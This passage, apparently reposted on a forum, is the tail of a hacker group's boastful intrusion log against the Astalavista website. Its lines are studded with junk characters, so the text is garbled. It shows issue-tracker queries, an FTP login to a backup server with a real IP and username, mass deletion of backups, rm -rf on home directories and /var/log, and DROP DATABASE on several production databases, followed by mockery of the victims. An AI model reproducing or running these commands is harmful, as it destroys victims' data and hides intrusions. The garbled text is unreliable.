| iss_summary      | iss_description                                                                             |" v3 H& _; r$ g1 X
+——————+———————————————————————————————+! V( j$ I6 K7 w( L
| Website guidance | Virtual Girl which guides you trought the website.: {' s/ A0 R6 J& v

: b# l& }: R2 R! a( q" c) S8 F+ [We need a girl with who you can ( talk )!!!* a; q- G4 \, k" }  U$ y
Also for the News!5 p  v. `& d, x) }
So my suggestion is a girl who read you the news loud if you like!
" w! h+ J, j8 y  e# l  Hyou can choose between read yourselfe or she read it for you or both!9 ~' V* g" q& O5 z5 }
1 T3 A1 o3 h0 f) O7 @+ U& _
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!4 x. D, c% p7 v4 G. t- Y% S* D' A

4 V/ S  T, e. ^1 p0 a  ZHave a look on the example girls!!
( V" r- N. f2 i' E8 {) s4 s
& X& x% [: \: W. W/ S9 y) J链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]" Z3 k. y! F9 T& j" C0 R
+ [' C) H$ U' u3 V+ ]
or that& B* I: d1 ]! B4 C3 A( V
, D! x. j) w" \7 y$ V
链接标记[url]http://www.yellostrom.de/[/url]; B4 Z' y$ L* A5 @# t2 }) }
, }" q* Z9 J8 c2 [: a
|
/ y# m8 B: i4 K" y5 `5 G, _8 J+——————+———————————————————————————————+' _2 I' h( N) m6 E* C! p. C
1 row in set (0.00 sec)6 g3 P* l; O2 {" h. [
: A* o: @& r0 t% f
// ha ha.
8 O& K5 {" M4 b/ u4 T3 @8 r! `( e/ g, c6 @! I' D
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
( w% g6 `5 K% S! P+————————–+———————————————————————————————————–+' G8 j4 t& [% ~: x' @3 F
| iss_summary              | iss_description                                                                                           |
' d$ `/ N9 G% h& r% Y: ^+————————–+———————————————————————————————————–+
9 d6 s# i" A1 K5 Z| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |6 _( p  Z2 b2 f* t. g
+————————–+———————————————————————————————————–+  s( c( m9 s& Q) D* W
1 row in set (0.00 sec)
. o" C9 A% H1 s+ ^& z% e9 F7 d* h- Q# ]+ H% b2 K( T( |9 k) ]0 m
// LOL.
- \! |( b' l2 y% U& R# W1 |, a# h! p! |9 q4 w
mysql> exit9 _9 u/ w$ u  i8 l2 x
Bye6 N; ^1 e; R9 i& R
- Z2 A$ Y1 q& ^; Y
sh-3.2# ftp 212.254.194.1638 A; L5 s7 m& y/ n1 G, c# D( J
Connected to 212.254.194.163.
, `* x- n$ j' g220 BackupCOM_VW FTP server ready.7 B( A% T7 L) a2 Y
504 AUTH: security mechanism ‘GSSAPI’ not supported.
! G$ t' }+ l) V  e/ N2 S- H504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
% U+ q9 ~6 j: t# e$ ^6 N0 b  H3 P# eKERBEROS_V4 rejected as an authentication type% E  M: k1 W3 G5 e
Name (212.254.194.163:root): astalavista.com5 |$ K4 G7 s# j/ e5 `3 H
331 Password required for astalavista.com.
! v7 Y+ |0 r0 B. \9 H% LPassword:
+ W* U( S; S8 {+ c& F/ a/ K230 User astalavista.com logged in.
6 R0 H! j: Q+ e4 L8 HRemote system type is UNIX.* c! ]9 q$ M* V5 f. e
Using binary mode to transfer files.% ~6 z4 B, ^3 ^8 @
ftp> ls -la
: T& H' n7 I& c/ Y( C8 n227 Entering Passive Mode (212,254,194,163,2,188): H2 u7 {  r5 a" n& g; Z% t- u
150 Opening BINARY mode data connection for ‘file list’.$ ~0 J" @9 B8 s
dr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
. g& w" d  {; P3 T4 C" I( J226 Transfer complete.( c. f0 T( Q4 l4 c1 Y
ftp> cd astalavista.com
' d+ E* ]- u9 s' g250 CWD command successful.
0 @" _* R4 G7 z7 o9 S1 zftp> ls -la& w9 k! E6 j6 H; S
227 Entering Passive Mode (212,254,194,163,2,189), G- S( k6 s/ J$ z
150 Opening BINARY mode data connection for ‘file list’.
" Y/ }( D# @) t( {-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar/ T7 O' }- x# H+ T0 b+ S! [
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
3 j& b  H0 [" a. _5 d-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
5 F/ R5 f( l* |-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar5 D4 y" K! X. X# b6 m! E
-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar7 J& e8 S9 C; |  I2 d* y( P3 l
[snip]' V5 X' v. w" ^3 Y/ P. h& I3 t( k
226 Transfer complete.+ m' t9 y, y0 X1 Z3 s
ftp> mdelete *
: t  K* {3 U( F' m7 m8 Dftp> ls -la. a  @. I) K1 g/ e, B+ K0 c
227 Entering Passive Mode (212,254,194,163,2,193)
5 o5 @! g6 R" p8 T" }/ }150 Opening BINARY mode data connection for ‘file list’.
9 G& b: |5 T3 d& V5 |& ^226 Transfer complete.) c' C3 `) ^0 C3 Q4 [/ V
ftp>* G$ i' }- u: ]3 a- n. S

" W4 a8 X+ q. V6 q  [sh-3.2# cd /home- e% V& g" B0 D* j  D( @
sh-3.2# ls -la
- M( \0 O3 W; U, A) ~+ i7 @total 120; b& f" B# h- B" e4 c  m
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
* K, x* [: M2 D4 r( _drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ... A& Y0 i" Z: m
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
( l& g4 f# u- q! k) u  ]5 N% }-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
5 x; r& v2 f. X8 G) _-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user* Z# v5 _7 ?2 Q2 x
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
+ ]% b1 @, v1 K* M% ydrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
( I! [9 U4 r4 N% H/ c7 Tdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
' a: Q* v$ A% l7 L" k0 Vdrwx–x–x 10 com     com      4096 Apr 28 12:40 com
! y% J/ @3 v9 R/ n. c/ H" r! Udrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
2 b* c" U" _& b9 s0 @+ xdrwx——  3 jon     jon      4096 Sep 21  2007 jon' F; P2 o% M* a& y1 `: f- L& N% |
drwx——  2 root    root    16384 Sep 11  2007 lost+found
8 @8 R. _& m' ]- zdrwxr-xr-x  2 root    root     4096 Sep 14  2007 my
& Q) ~, ^) e( W2 b( e9 h* Q8 K( X$ m# {drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata, c$ o9 E* U; u" U" a' ~. ]- C
drwx——  2 jon     jon      4096 Sep 15  2007 test1 A9 q: {% i7 Q2 V
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
. R, ^) W5 V6 N, @6 S6 g' A
1 i" O3 T! F1 a* Ksh-3.2# rm -rf backup/
  W' j( b# N  [+ W" _sh-3.2# rm -rf backup.14161/
- A- T8 \! h' G! c( Jsh-3.2# rm -rf ftp/
2 h; M/ u0 K0 o( r) T& ysh-3.2# rm -rf jon/8 }! c$ y3 K) t% }/ u1 [
sh-3.2# rm -rf my/
* v" X$ d" D$ s7 V7 c+ |: \sh-3.2# rm -rf mysqldata/# X! D! [& R: t3 S" g# `9 N
sh-3.2# rm -rf test/0 h$ {: W2 e7 U
sh-3.2# rm -rf tmp/# X2 u' a( Q: h! v8 S* E
sh-3.2# cd ~
. a7 r% S  m, R2 _sh-3.2# rm -rf *4 E: I0 a! y5 p( t
sh-3.2# rm -rf /var/log/: [8 t; n8 t+ b. `8 V+ t9 B! P
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
& S8 h% k6 @$ r' f7 T* _sh-3.2# rm -rf /home/** Y# z# v* o- }) e! A1 ]* G2 S% _9 B
sh-3.2# mysql
* ?9 b& p3 v- i3 k, u% x* K6 fWelcome to the MySQL monitor.  Commands end with ; or \g.
2 w6 W, C0 t8 K" HYour MySQL connection id is 407156
& B- |% P5 r; q7 C1 KServer version: 5.0.45-community-log MySQL Community Edition (GPL)
: B% I8 G2 v" M7 }# Q. S# o
" J7 w; Z4 D6 p; JType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; _" l0 |' k6 I$ s* @( z' [' e
& ^  b! e6 u/ V( L5 Gmysql> show databases;
. t- c4 L5 `& w* ?, C. o9 U+———————–+. T  U0 \. _0 R5 W* S! k" d4 X
| Database              |/ Z" D! s7 I7 {. x* u
+———————–+5 Y" |; y+ k8 ^8 S
| information_schema    |
& i9 G$ @1 N+ A/ D% F* e) \| astanet_ads           |, I; @5 q6 l! I  ~" t0 A' g
| astanet_mailing_lists |+ J9 `3 v& T/ J( N, _
| astanet_mediawiki     |+ I* s. ?% J2 D6 l3 k+ |
| astanet_membersystem  |7 K! z2 X- Y" `4 [; h+ J, B
| com_contrexx          |- B" _  Z1 k( x. x0 L
| com_contrexx2         |
5 ], `" D* G* t5 A! N| com_contrexx2_live    |
9 g- l  ~: H. w| da_roundcube          |: S+ a. O1 Q" w0 x* C! O* R- q- [
| dolphin               |
7 ^2 l. C' Q5 r9 G6 S| ideapool              |
: J/ q. {) k' z" i| mysql                 |% q* O: J& T6 f& S5 l& ]
| test                  |
/ Y9 O. {# q3 O" @+ `| yourmaster            |
* i+ ?6 w- T. g0 |; G+———————–+
7 S8 h* w8 o( D/ D0 s; W7 c14 rows in set (0.03 sec)( U' m+ q9 x5 @
8 a, P; Q) j) |' c
mysql> drop database astanet_membersystem;, [8 v4 T2 C3 A" F+ v/ Y
droQuery OK, 46 rows affected (0.81 sec)7 ^' {1 X) a' o3 Y: M* w1 j& h

8 U: _% @6 D" j6 lmysql> drop database com_contrexx;
- l+ E, q9 o3 n( fQuery OK, 211 rows affected (2.72 sec)
3 S: Y/ g- x5 B& @) g0 x7 Z- O( {  C! c* K& y
mysql> drop database com_contrexx2;
8 |3 X- v/ Y$ p6 m! jQuery OK, 237 rows affected (2.23 sec)' y/ p1 K/ p7 q% I
. k* J/ c5 u$ s6 s
mysql> drop database com_contrexx2_live;9 p4 O' h! P7 r1 t3 l. ~
Query OK, 227 rows affected (7.63 sec)1 j* @! S7 g: w/ T

! X2 t) H# R, l: s+ S! ~5 {mysql> drop database ideapool;2 T9 R+ P/ C0 D
Query OK, 69 rows affected (0.19 sec)  T7 b. D- A$ |% J) E

9 G; m# o  d3 q" h& [mysql> drop database yourmaster;
$ k5 p. g& K* j" k( }# k% aQuery OK, 158 rows affected (0.55 sec)
& l& j" S# B& [# H- Q
( v$ `1 a+ ]  [" |0 f8 ^( x9 Bmysql> drop database astanet_ads;( E( H0 I1 N& F  G
Query OK, 9 rows affected (0.11 sec)5 Q9 m6 ]% {4 v" }8 i5 p$ J
& `) ]  Q8 O. A9 `
mysql> drop database astanet_mailing_lists;
# u; A. O( q1 Z5 K6 ?/ l4 lQuery OK, 24 rows affected (1.47 sec)
: o  ^  x4 L) Q' u: R: T
+ G3 m0 z: ^; O3 {- s& nmysql> drop database astanet_mediawiki;
4 q% e  q7 y! l& sQuery OK, 31 rows affected (0.51 sec)* S" X# @# x0 i/ a' i" j3 ^

# }2 k) M1 E" t1 G9 t1 A9 Hmysql> show databases;
$ b, ?# r) e! o* N1 J9 }+——————–+8 x# G4 j! w) l% `$ L8 ~$ @- u" R
| Database           |
  O. H/ I+ Z7 X( H2 I+——————–+: a& w; d) J; A
| information_schema |
; X, y' `! U6 O+ B5 Q" {% A1 C| da_roundcube       |  `  O: a- Q7 Y. s5 S
| dolphin            |' |  ]. o, Z) ]$ l! F) s
| mysql              |
2 f. [( m0 n/ w0 y0 |, o0 o8 y| test               |
3 t! C$ ?; j5 ?+ f5 f4 p, Z+——————–+
6 I1 A, O( I* ~# o, ^5 rows in set (0.00 sec)
7 B0 B: V. @9 K( `0 \, P3 T* m: w5 }
What a journey! We’re not sure exactly why the “Terminator” had any influence on! R# ~+ F8 b/ E  g0 P
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
' a2 i- C2 q+ G9 K9 i0 wwrong to say this pack of morons *wont be back*.& |: f) r/ m! O2 c' q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表